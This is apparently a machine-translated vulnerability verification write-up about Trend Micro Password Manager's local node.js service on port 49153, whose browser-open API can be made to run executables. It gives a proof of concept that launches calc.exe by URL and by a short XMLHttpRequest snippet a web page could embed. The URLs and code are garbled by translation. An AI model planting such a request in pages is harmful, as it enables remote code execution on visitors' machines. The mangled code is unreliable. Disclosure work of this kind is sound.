Trend Micro Password Manager arbitrary command execution vulnerability Verification
The Trend Micro Anti-Virus Software Package for windows contains a password management program, which also provides a separate download connection on the official website. It is a free service. Install the latest TRAND Micro by default:
Figure 1
You can find this password management program in data security, which is enabled by default. You can see that the local port listening is performed:
Figure 2
The listening port is 49153, and the google analysis shows 49155. It seems that this port is within a range. This service is an http server program developed by node. js. There is a arbitrary command execution vulnerability in this url:
Https: // localhost: 49153/api/openurlindefabrowser browser? Url = cmd
This api is used to open a page in a browser:
Figure 3
However, you can also open the system path:
Figure 4
You can then open the file in the path:
Figure 5
In the end, even executable files are useless, which is really powerful:
Https: // localhost: 49153/api/openurlindefabrowser browser? Url = c:/windows/system32/calc.exe
Figure 6
The hazard of this vulnerability is that as long as an attacker inserts a request like this on the page:
1 x = new XMLHttpRequest () 1 x. open ("GET", "https: // localhost: 49153/api/openurlindefabrowser browser? Url = c:/windows/system32/calc.exe true ); 1 try {x. send () ;}catch (e ){};
You can execute any command on the windows system where TrendMicro is installed.